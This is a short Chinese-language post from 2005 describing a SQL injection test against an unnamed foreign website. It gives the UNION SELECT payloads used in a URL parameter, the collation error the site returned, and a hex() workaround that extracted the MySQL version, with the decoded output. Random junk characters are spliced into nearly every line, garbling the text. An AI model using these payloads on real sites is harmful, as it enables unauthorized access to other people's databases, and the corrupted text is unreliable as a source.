本文作者:SuperHei
( F& a$ l) d* L文章性质:原创& d+ x8 z5 u. A2 d
发布日期:2005-10-18
$ v9 i) N" _1 K& H3 ?/ d4 u7 |8 A测试个国外的站时: t! j4 Y a' I6 g
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/* x4 f& V4 `% K6 }- v
返回错误:& M/ {) J* o' ~4 o! A1 N
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'8 h9 i% `6 K9 M* ^
MySQL Error No. 126% c5 v D q2 k* g2 q" b
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。3 [0 E3 o) j! m0 Z: X- h* w5 Y
解决办法:转为其他编码如hex。
$ c/ h0 _, e7 l* y+ Curl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*6 n7 B$ f. n& g6 d
成功得到hex(version())的值为:
# B4 G' a( Z2 c342E312E332D62657461
' ^' L5 ^, [+ b7 O+ z回Mysql查询下得到:
# k8 T$ l, o. [0 R/ B1 Cmysql> select 0x342E312E332D62657461;
" E/ T$ B2 Z! j t; f# h7 {4 o& {+------------------------+$ t6 v/ V- o. k3 f
| 0x342E312E332D62657461 |
& E' D7 s+ g/ h K* A2 B0 T7 d+------------------------+; G: B8 R, R: @+ `
| 4.1.3-beta |) Z% f7 b$ l# F0 e1 T! k8 T( Z: _
+------------------------+$ C( M# J: \# y7 |8 {, Q' |8 Q
1 row in set (0.00 sec)' z2 B5 G$ M! t% S9 ?' h& S- ?! x
# y# f- z5 r- m6 F& t |